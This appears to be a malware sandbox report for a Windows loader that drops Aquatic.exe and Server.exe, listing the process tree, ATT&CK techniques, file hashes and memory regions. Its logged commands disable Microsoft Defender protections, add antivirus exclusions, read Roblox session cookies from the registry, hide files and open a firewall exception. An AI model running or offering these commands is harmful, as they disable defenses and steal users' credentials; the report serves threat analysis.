        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1928
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        8⤵
        
        PID:3048
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        8⤵
        Views/modifies file attributes
        
        PID:1832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        8⤵
        
        PID:1332
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        8⤵
        
        PID:2704
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        8⤵
        
        PID:2752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:2484
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2376
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:2600
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Server.exe" "Server.exe" ENABLE
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        7⤵
        Executes dropped EXE
        
        PID:376
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        8⤵
        Executes dropped EXE
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:968
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        8⤵
        Executes dropped EXE
        
        PID:992
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        9⤵
        Executes dropped EXE
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        9⤵
        Executes dropped EXE
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        10⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2984
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:1632
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        11⤵
        Views/modifies file attributes
        
        PID:892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2788
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        11⤵
        
        PID:2056
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        11⤵
        
        PID:924
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2768
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:1712
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2532
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:304
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        10⤵
        Executes dropped EXE
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        11⤵
        Executes dropped EXE
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        11⤵
        Executes dropped EXE
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        12⤵
        Executes dropped EXE
        
        PID:2424
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        12⤵
        Executes dropped EXE
        
        PID:2808
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        13⤵
        
        PID:1720
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        13⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        13⤵
        
        PID:952
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        14⤵
        
        PID:1896
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:1884
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        15⤵
        Views/modifies file attributes
        
        PID:2184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        14⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        14⤵
        
        PID:2500
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        15⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        15⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        15⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        16⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        16⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        16⤵
        
        PID:1164

C:\Windows\system32\taskeng.exe
taskeng.exe {625A14E1-30BE-4B69-9BA7-FB6D77A4357B} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
1⤵
PID:1092
- C:\Users\Admin\AppData\Roaming\Ondrive.exe
  C:\Users\Admin\AppData\Roaming\Ondrive.exe
  2⤵
  - Executes dropped EXE
  PID:1676

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zOCB9D6778\loader.exe

Filesize
5.2MB

MD5
c136329a989aad9543c913f9197a01fe

SHA1
0b3bdab50947cf330243938c9ccb3e685c43457b

SHA256
9b802ef1b1e58a521a45dbd45c48c75c5b7f9ac53b273d6d2cf868c1f6d46885

SHA512
fa7a7efa10b4da760b7d281aa235fa4bb4ce28d12796f28632fd653ae184a6f09bc796c18ba1aa3253f713af0334d97f040dc762a8a1d25352dc7308d49b8590

Download Submit
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe

Filesize
229KB

MD5
56c788116da32ec8e9ac3b1b0e66b520

SHA1
545f203f2bdf6fac2f131a76a5f36e21637b27ca

SHA256
f67268d2659ceb1e8cf8a7560784372294bcd8f249f7c0efdf33216722a5f0bb

SHA512
7da85b8e5f92f4a448a10f5c60c21f46b3eb511fda461b15956339ca7130c901e05ad58856a3a3903cdb52b81c4051d3bb0222e87aefab87136351d1ff01734f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kv2DG7OurPAY7Xd

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server.exe

Filesize
71KB

MD5
f9b08bd21b40a938122b479095b7c70c

SHA1
eb925e3927b83c20d8d24bdab2e587c10d6ac8cd

SHA256
c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8

SHA512
fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\gcDdU6YvqJx27rq

Filesize
20KB

MD5
bbfdb7547a250de10c87b9203e0fbfc4

SHA1
218c0ba002caed2edce3ed6ea3fa4cc3686ffeb9

SHA256
f022d02d1172087fb3d4d148bcb378cdb42e8cbff1c2ea2995d139f6c7fc730d

SHA512
50554e2c0b9bfd85c37b0da33736fee879ed9f2bc66262317d593f6c7cd68cdc7826f302638e5ee100d435cdf9c0ff6b37522ed0bf2c46442e9c1379e89e97b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\loader.exe

Filesize
5.1MB

MD5
24b1beaf827ed5732cc435c76170afb0

SHA1
dbab0b15b40f22765af4219d6db16579396b0ae7

SHA256
5365a7256f9b85da3eb0aaaf1ddf50ee2928c0d3b23b89a21a9400b6502ad4f2

SHA512
00cf09d9066d654776d835597cfa228b7b33a4a083e8564c172d3ac78bf249feb87187e88de22be4720484d60a34dfbfd4f47bff404960627bde4837d896e4ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_2504_133775450783680000\main.exe

Filesize
36.6MB

MD5
fd558700e832c55b847fbaa2f9c77f48

SHA1
db8a95fa38c5f59f7908c4a36efe4f62191c3f77

SHA256
89ccb259276786bda67b5f70d1dbc55eb7d0ab6333254f75b6f60fee10c30637

SHA512
14d275d4f3b9c4c06920dbc7fd85c01357402eba85968a06cabb0852c43d9d64d1d30e9dffd744c450b3174064f95076369f1f8173dcfd3412b89f194f71dc41

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_2504_133775450783680000\python311.dll

Filesize
5.5MB

MD5
58e01abc9c9b5c885635180ed104fe95

SHA1
1c2f7216b125539d63bd111a7aba615c69deb8ba

SHA256
de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837

SHA512
cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081

Download Submit
C:\Users\Admin\AppData\Local\Temp\vjhyHvbnCXU8VHF\Browsers\Cookies\Chrome Cookies.txt

Filesize
259B

MD5
bd9efe5d776571290272c0764665a41e

SHA1
8489be80886545a50af9b23a75c4788c3d1d396c

SHA256
d138f6a9b840739f7e65ba8352030ac18ee6d69c20531a2c0438140946c0ea4d

SHA512
b3157ac955466b702bcffda7982ce0aed63a4689a0a243e6089cc0813c2ee0203a2d6a68005299798e586bf5468f57c4e43d2fe92d1cd070f8ecb040cc192c79

Download Submit
C:\Users\Admin\AppData\Local\Temp\vjhyHvbnCXU8VHF\Display\Display.png

Filesize
221KB

MD5
9028553dc829351418a141eae707f216

SHA1
d4437ee573a2c6639def216b3edb2495f6bf1a31

SHA256
b94dc4c9f55157ae16d472dec6b619087c2ed7accf9c9f6855630059dbd6ac70

SHA512
f1df8c7e5a41a05c4f88c612844009a66eeae2af4943614d729d873ad8c2de8806d21a59adea73b96927dee0fa212041a58abfb6c88edbdf20166bb655d466c9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N6J1J0VV0DV87R7XDIHC.temp

Filesize
7KB

MD5
051d6efaffc201c1b1bf37210da34921

SHA1
bfef38f402c3973b339af45663aad56cd1cf2d09

SHA256
4ee18c1fc18b159de3404171a98e287673b47595bbea33c614895c199c687d40

SHA512
212fd0a2997a762fb2f558e143dce52b98d64d3a6d2c363133261073144c4f79362633d7e1dd1b37820727535bf98412bb9e20f65ea7886243ac288a1c83b2db

Download Submit
C:\Users\Admin\AppData\Roaming\Server.exe

Filesize
23KB

MD5
32fe01ccb93b0233503d0aaaa451f7b2

SHA1
58e5a63142150e8fb175dbb4dedea2ce405d7db0

SHA256
6988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43

SHA512
76945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6

Download Submit
C:\Users\Admin\AppData\Roaming\conhost.exe

Filesize
37KB

MD5
b37dd1a1f0507baf993471ae1b7a314c

SHA1
9aff9d71492ffff8d51f8e8d67f5770755899882

SHA256
e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc

SHA512
ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\7zOCB928108\main.exe

Filesize
24.1MB

MD5
c4639a9dd4fa418a1e2e5537b9a53bfe

SHA1
9fea0f4615170667aa59dac92f6d424455b5fc54

SHA256
6548853e51522d28bc2d4ee6dbecdfe7be496462cb87f26587f830374ce07ec7

SHA512
2e5f53a2d4bae0028ecb715485327db9da7aeb45176e7e54db039516dab6002f41b5f44ae728f7752ee840f34b14ac78698cea3bc4cc2d00ea815873bad6b692

Download Submit
memory/892-150-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

Filesize
2.9MB

Download
memory/892-151-0x00000000029F0000-0x00000000029F8000-memory.dmp

Filesize
32KB

Download
memory/988-135-0x0000000000350000-0x0000000000360000-memory.dmp

Filesize
64KB

Download
memory/1032-142-0x00000000003E0000-0x00000000003F8000-memory.dmp

Filesize
96KB

Download
memory/1100-119-0x0000000000930000-0x0000000000948000-memory.dmp

Filesize
96KB

Download
memory/1200-303-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/1200-302-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/1588-286-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/1588-287-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/1676-251-0x0000000000300000-0x0000000000310000-memory.dmp

Filesize
64KB

Download
memory/1688-112-0x0000000000AB0000-0x0000000000AF0000-memory.dmp

Filesize
256KB

Download
memory/1812-105-0x0000000000AA0000-0x0000000000FDE000-memory.dmp

Filesize
5.2MB

Download
memory/1896-333-0x00000000000D0000-0x0000000000110000-memory.dmp

Filesize
256KB

Download
memory/1928-243-0x0000000000DB0000-0x0000000000DF0000-memory.dmp

Filesize
256KB

Download
memory/1940-296-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/1940-297-0x00000000020F0000-0x00000000020F8000-memory.dmp

Filesize
32KB

Download
memory/2076-256-0x0000000001D10000-0x0000000001D18000-memory.dmp

Filesize
32KB

Download
memory/2272-221-0x00000000008D0000-0x00000000008E8000-memory.dmp

Filesize
96KB

Download
memory/2292-166-0x000000001B570000-0x000000001B852000-memory.dmp

Filesize
2.9MB

Download
memory/2396-158-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2396-157-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2620-171-0x0000000000370000-0x0000000000388000-memory.dmp

Filesize
96KB

Download
memory/3064-124-0x0000000001360000-0x0000000001874000-memory.dmp

Filesize
5.1MB

Download